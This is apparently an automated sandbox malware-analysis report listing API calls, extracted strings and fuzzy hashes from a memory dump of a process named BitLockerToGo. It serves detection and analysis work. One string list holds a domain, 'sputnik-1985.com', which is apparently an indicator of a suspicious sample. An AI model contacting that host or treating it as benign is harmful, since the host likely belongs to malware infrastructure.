                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: BlanketProxy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3890896728-0
                                                                                                                                                                                                            • Opcode ID: 2c655fd4df2f0de855ff40a5662be0aaac86da99f90f76558f58a47c1ac7514f
                                                                                                                                                                                                            • Instruction ID: 6701a38e9beb56b1775abd9ce08e5b6b7616d16b42eebe8ce345441057ef8d6a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c655fd4df2f0de855ff40a5662be0aaac86da99f90f76558f58a47c1ac7514f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BBF074B46093029FE354DF69D5A871BBBE1EB88304F11881DE5958B390D7B59648CF82
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C673
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Initialize
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                                                                                            • Opcode ID: 413737427438556d5fa7e0556733acb83c5b4eac6897b874756f3227497564db
                                                                                                                                                                                                            • Instruction ID: a6b7534e426cd29cb0e1e31caee4a3ce77516a25d8fe1d9d75e6d40f069d1f8c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 413737427438556d5fa7e0556733acb83c5b4eac6897b874756f3227497564db
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CBE0C236E506442BD6046B1CDC47F8A3A1AC3C3726F4C8234A550CA2C5E938B910C15E
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C6B0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
• Opcode ID: 4b317f61b4ed6c220f3feb26dab4a859da40cf1549f870816065b6807c59d919
• Instruction ID: ca338ed000cba09c134a9ecbf479b52692d88648cc8417c010cf118771328cdf
• Opcode Fuzzy Hash: 4b317f61b4ed6c220f3feb26dab4a859da40cf1549f870816065b6807c59d919
• Instruction Fuzzy Hash: 7DE05E39BD47406BFA385B08DC13F4422129386F21F388224B310EE7D9C8A8B501420C

APIs
• GetForegroundWindow.USER32 ref: 0043E6A5
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
• Opcode ID: b48e2f79c62e4811e334b2433c8222d9ec698c1a03c7fb9f9c38adda7ff18471
• Instruction ID: eb5cd64e0cd090f695d5de900f82e4eebcc02a3ea27d0b2ee91ac1c0039229b8
• Opcode Fuzzy Hash: b48e2f79c62e4811e334b2433c8222d9ec698c1a03c7fb9f9c38adda7ff18471
• Instruction Fuzzy Hash: 2BC012EC9084808BC248EB12EC4252A3B5EAA8A209B049038D80B02B23E9306805968A

APIs
• RtlFreeHeap.NTDLL(?,00000000,00000000,0043D8F6,?,?,?,00000000,0040B40D,00000000,00000000), ref: 0043BCCE
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 85ba4f6bb3df290ded2e1b23f993eb3f5d5984f7020326030569786283a59457
• Instruction ID: 6c6d5fcf156c4dc9181b7fd85535f9ef3000d663acf77e4cc9904710c0b9b036
• Opcode Fuzzy Hash: 85ba4f6bb3df290ded2e1b23f993eb3f5d5984f7020326030569786283a59457
• Instruction Fuzzy Hash: AED01231405122EBC7241F18FD06B873B64DF0A321F030472B8006B071C664EC519AD8

APIs
• RtlAllocateHeap.NTDLL(?,00000000,?,AC36FDA1,00408797,2D2C008A), ref: 0043BCA0
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: b3415836e398222536a54de0d850da02531c529426d1bee4289f1127ff9466bd
• Instruction ID: 28c2b2b5d3f1f64fcd0aca9316f6b1f640d95bbb8965ee836e226e74b875d2a4
• Opcode Fuzzy Hash: b3415836e398222536a54de0d850da02531c529426d1bee4289f1127ff9466bd
• Instruction Fuzzy Hash: DBC09B31445121ABC6142B15FD05FC67F64DF45355F114066B40467073C770AC41D6D8

Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: -$/$8$;$;$A$C$E$G$I$J$K$M$O$a$c$e$g$i$k$m$o$q$s$u$w$y${$}$~
• API String ID: 0-1589385449
• Opcode ID: 08dd65442de94eabfc3cdf6d35326c8f72eb4104f2c4c18c14e31ef637717d18
• Instruction ID: 1b177812bac92343aee33b27717da1fbbd16d72b67d831a1239cd13586a5dfd8
• Opcode Fuzzy Hash: 08dd65442de94eabfc3cdf6d35326c8f72eb4104f2c4c18c14e31ef637717d18
• Instruction Fuzzy Hash: 28B1A2616087D18ED726CE3C88883467F911B66224F1D83E9D8F99F3DBC2A9C946C365

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: Object
• String ID: $IC$%*+($%MC$($)OC$4KC$;JC$FQC$JHC$MOC$NRC$gQC$nOC$xPC$}LC$EC$JC$LC
• API String ID: 2936123098-1372895061
• Opcode ID: 83f85164f53318fb957040d32909a50b7653dd08b5524637615f1529882b32b1
• Instruction ID: 36275d4299c1cc8a6f4b0a2dda9d59d0b137285972a6756889d8cf952a04f1ae
• Opcode Fuzzy Hash: 83f85164f53318fb957040d32909a50b7653dd08b5524637615f1529882b32b1
• Instruction Fuzzy Hash: DF82A2F0E163249FDB998F18DC51B9ABBF9AB49744F2040DEA00DE7350CB761A818F59

APIs
• RtlExpandEnvironmentStrings.NTDLL(?), ref: 0040F4B9
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: EnvironmentExpandStrings
• String ID: 2$7$9$H$H$V$j$v
• API String ID: 237503144-1978986865
• Opcode ID: 4be2ad93ad263aa24791d851425d7f447bfb02ac2ebeaf19bb492b4805c9857a
• Instruction ID: 82d8f7b26a8b2fa1bbcf6840c7d4f9747383a6517706711a2926001e1f175bd0
• Opcode Fuzzy Hash: 4be2ad93ad263aa24791d851425d7f447bfb02ac2ebeaf19bb492b4805c9857a
• Instruction Fuzzy Hash: A452AF3250C7908BD3249B38C4553AFBBE1ABD5324F198E7EE8D9A33C2D67889458747

Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: A$S,3!$bxA$@AF
• API String ID: 0-2069903589
• Opcode ID: 51a7bc412986f8b3ea5974b480de9a556fa70d4e40814ebbc0f959896439f117
• Instruction ID: 6ded76c8cc6ff0f80e96e1d1ae2300ae6fa5ef525a8552055949680e93883b28
• Opcode Fuzzy Hash: 51a7bc412986f8b3ea5974b480de9a556fa70d4e40814ebbc0f959896439f117
• Instruction Fuzzy Hash: FF72357150C3418BD324CF28C8907ABB7F2EF96314F19896EE4C587392E7398985CB96

Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: "0B$%<$$(99#$OIE{$Z_-c$gM$sputnik-1985.com$-A+$~|$?'
• API String ID: 0-1527217465
• Opcode ID: 1a2107a0d9ca9d91116f4215fd163885d8c2ef582804c35b4f29d4efd173d59b
• Instruction ID: 5c5e0a10dac633df7a7eb912dad582696f6b243f8df0ab356ae229ec7ebc779d
• Opcode Fuzzy Hash: 1a2107a0d9ca9d91116f4215fd163885d8c2ef582804c35b4f29d4efd173d59b
• Instruction Fuzzy Hash: D30279726083919FD318CF25D89176BBBE2FBD2314F588A6CE4D18B395D7788805CB86

Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: ($?$f$u$}
• API String ID: 0-3561895482
• Opcode ID: 034806d3cc72206703f70723c548ba8ea1711a660e6f03707adc4ef9bcdfc4e3
• Instruction ID: 86e3bcde5e116734b7454ff0522683787c5f8ed0e2df54b8e8f55331097e388c
• Opcode Fuzzy Hash: 034806d3cc72206703f70723c548ba8ea1711a660e6f03707adc4ef9bcdfc4e3
• Instruction Fuzzy Hash: B212A371A0D7808BD324DF39C4813AFBBE1ABD5314F198A2FE5D997391D63889418B47

APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 004238A8
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,6A195A3A), ref: 0042394C
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
                                                                                                                                                                                                            • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                            • String ID: 52$QVTH$]VWC$lnmh$n`fn
                                                                                                                                                                                                            • API String ID: 237503144-3964871452
                                                                                                                                                                                                            • Opcode ID: f42c4c6db4055bdca425bc9ce26f544c9401cc625d8d536d0403780354460537
                                                                                                                                                                                                            • Instruction ID: 3b8b4807c8318ae77837d9a5b010143032c821d60a60d601bdcb57454f2de873
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f42c4c6db4055bdca425bc9ce26f544c9401cc625d8d536d0403780354460537
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2FE1457160C3518FD720CF68D8917ABBBE1EB85314F444A3EF99587381D3B89906CB9A
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MetricsSystem
                                                                                                                                                                                                            • String ID: $)6C$C7C$Y8C
                                                                                                                                                                                                            • API String ID: 4116985748-1654261340
                                                                                                                                                                                                            • Opcode ID: 5c122eb9c0143f1b49a1e8f4bb7b68f4f6dba1365be09ef1174e0909afcf80c5
                                                                                                                                                                                                            • Instruction ID: 4b006a6d5d8b16d53f58adea831d835725ce84f357d2a915258799e4b83f44bd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c122eb9c0143f1b49a1e8f4bb7b68f4f6dba1365be09ef1174e0909afcf80c5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E817CB45193808FE360DF25C58879EBBE0BB85348F508D2EE4D88B350DBB89549CF5A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 2&!w$EW4$IIMC$O!);$T##"$T##"$uP$yt
                                                                                                                                                                                                            • API String ID: 0-2143932533
                                                                                                                                                                                                            • Opcode ID: 09effc1b13daa91b72845bbbe66f33b8a5e808bbdc37d5409809ad00b593fd89
                                                                                                                                                                                                            • Instruction ID: b7e6f6c2e259c59c372040f3070f569a967029d4438ee1149a109cc5271046c8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09effc1b13daa91b72845bbbe66f33b8a5e808bbdc37d5409809ad00b593fd89
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64C1147160C3918AD715CF39845036BBFE1AB96314F18896EE8D59B3C3D23DC90AC756
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: %$&$9$<$R$T$W$b
                                                                                                                                                                                                            • API String ID: 0-3780034300
                                                                                                                                                                                                            • Opcode ID: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
                                                                                                                                                                                                            • Instruction ID: 26f6469176a43b47c6e288f4693b2497bb05b8a0a051c4656522d96c8d770806
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10719F2250C7C28AD3128A7C484425BEFD25BE7234F2D9FADF4E5873D2C56AC50A9367
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Clipboard$CloseDataGlobalLockOpen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1494355150-0
                                                                                                                                                                                                            • Opcode ID: 07f84929871a5c64471c921f03cbf394aaa8fd21632cc30f04fff1ccf22f28ed
                                                                                                                                                                                                            • Instruction ID: 693f7ef225a156252cf7c29a72516dce540735802ffb423964d4f98d76e8ff95
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07f84929871a5c64471c921f03cbf394aaa8fd21632cc30f04fff1ccf22f28ed
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A510572A187614EC310DF7C894521FBAE15BC9224F098B3EE8E4973D1C678890A87D7
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0043D910: LdrInitializeThunk.NTDLL(004409B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00419E7D
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00419F1E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                            • String ID: NO$v
                                                                                                                                                                                                            • API String ID: 764372645-2536501430
                                                                                                                                                                                                            • Opcode ID: e994bf9aca9ffad251a8e8e39955b3cd0e821797c371950e4c131b848a4e05ab
                                                                                                                                                                                                            • Instruction ID: abe4a73a967468b274d366e370c220422a45fd0295e639bb6f5522fed691f7b9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e994bf9aca9ffad251a8e8e39955b3cd0e821797c371950e4c131b848a4e05ab
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26924975A183419BE724CF24C890B6BBBE3ABD5304F29C82EE08587365D679DC91CB47
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: %"$<$T_XY$UUp$lI$~9
                                                                                                                                                                                                            • API String ID: 0-1611585724
                                                                                                                                                                                                            • Opcode ID: 17319177cc18e58b46021cdb8643903c862ce1f4d13ca6f91d71c1ebdd3c6515
                                                                                                                                                                                                            • Instruction ID: 5cd483bddd2b52e9b22b037f4d3c0dc2645df5a79fafa00e6023d7c932b65d9b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17319177cc18e58b46021cdb8643903c862ce1f4d13ca6f91d71c1ebdd3c6515
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7C1067564C3504FD328CFA9949026FBBE2ABD2304F1C853EE5E55B381D679890A878B
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00428DFB
                                                                                                                                                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00428F3C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                            • String ID: rM$zM
                                                                                                                                                                                                            • API String ID: 237503144-2784921869
                                                                                                                                                                                                            • Opcode ID: d018b77fafad30eede66eafc2b8166c57735da819279e606327805be91c2026e
                                                                                                                                                                                                            • Instruction ID: 97ddf7a0595f55843d8ed3a5592f022fec3ca497b996ab7f20284500c0a95c28
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d018b77fafad30eede66eafc2b8166c57735da819279e606327805be91c2026e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D661D0F0A443219FE754CF69C991A9ABFB0FB46350F1A42ADE4459F392C3748842CBD5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Sin;$YzW+$dMKP$lmeH$xHLG
                                                                                                                                                                                                            • API String ID: 0-2485238161
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 3$h2h0$AC$EFG$^
• API String ID: 0-608315617
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 3DJ$@DrF$AH3$QmST$geYd
• API String ID: 0-2788220846
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00427DC0
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00427E49
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: EnvironmentExpandStrings
• String ID: 7e1
• API String ID: 237503144-1127181755
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00427E49
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: EnvironmentExpandStrings
• String ID: 7e1${B
• API String ID: 237503144-3235371320
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00427E49
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: EnvironmentExpandStrings
• String ID: 7e1${B
• API String ID: 237503144-3235371320
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: D$FaA$U2F0$ZyZ{
• API String ID: 0-749592270
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: J$n~xx$urz|
• API String ID: 0-3220001382
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: BDE:$L4$L4
• API String ID: 0-3692522541
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: :G!A$Vw1q${u
• API String ID: 0-645793561
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: $0Qx$*0Qx$`a
                                                                                                                                                                                                            • API String ID: 0-2354730689
                                                                                                                                                                                                            • Opcode ID: 7bdbeef81bf970ed795b7748677985d075231058f587ee6d2346d196102fc5af
                                                                                                                                                                                                            • Instruction ID: 6e7c93c0a148da01ad464f35dcf862257e7f2efdc77a60f70c0a7fadf4f8a59e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bdbeef81bf970ed795b7748677985d075231058f587ee6d2346d196102fc5af
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5D1243F618212CBCB188F29D86126BB3F2FF8A752F1A947DC485472A0EB789C51D745
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: "uB$)yB$QyB
                                                                                                                                                                                                            • API String ID: 0-1484077961
                                                                                                                                                                                                            • Opcode ID: 0cd158f3e7f884d7cc2612b3f5f2fb899bdbdf91b851aaf563b828fa1a0cb41f
                                                                                                                                                                                                            • Instruction ID: bebb4fd51b4539f016b18d377b659452e01560476b88e099c37467506dc643be
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cd158f3e7f884d7cc2612b3f5f2fb899bdbdf91b851aaf563b828fa1a0cb41f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75D12676A0C351CFD714CF28D85131ABBE2AF86314F0989ADE4959B3A1D738ED41CB86
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: >MA$]k$rIA
                                                                                                                                                                                                            • API String ID: 0-1646247225
                                                                                                                                                                                                            • Opcode ID: 4b84b9957e39165ea7d9a40e7597085d8ffd6de602ec7e9299e06c7fe6263af9
                                                                                                                                                                                                            • Instruction ID: 7dcd1ab1f66cc66079ed29567c30894e9083a3f88b64816671fdba32d81f215f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b84b9957e39165ea7d9a40e7597085d8ffd6de602ec7e9299e06c7fe6263af9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 604158B6A4836286D718CF24E8513A7B3E2EFE5314F19443ED88597781F7788C41C39A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 0$8
                                                                                                                                                                                                            • API String ID: 0-46163386
                                                                                                                                                                                                            • Opcode ID: 7fbf971c7b98c1d34c34e8907e7335c9f26517fb32f9339876bd19e7f8c73690
                                                                                                                                                                                                            • Instruction ID: a24fc17715fdec5a2fa229d4773a009ac4947e42e4396509e056516fea690fd9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7fbf971c7b98c1d34c34e8907e7335c9f26517fb32f9339876bd19e7f8c73690
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E7226B16083419FD714CF18C880B6BBBE1EF98314F44892EF9999B391D379D948CB96
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
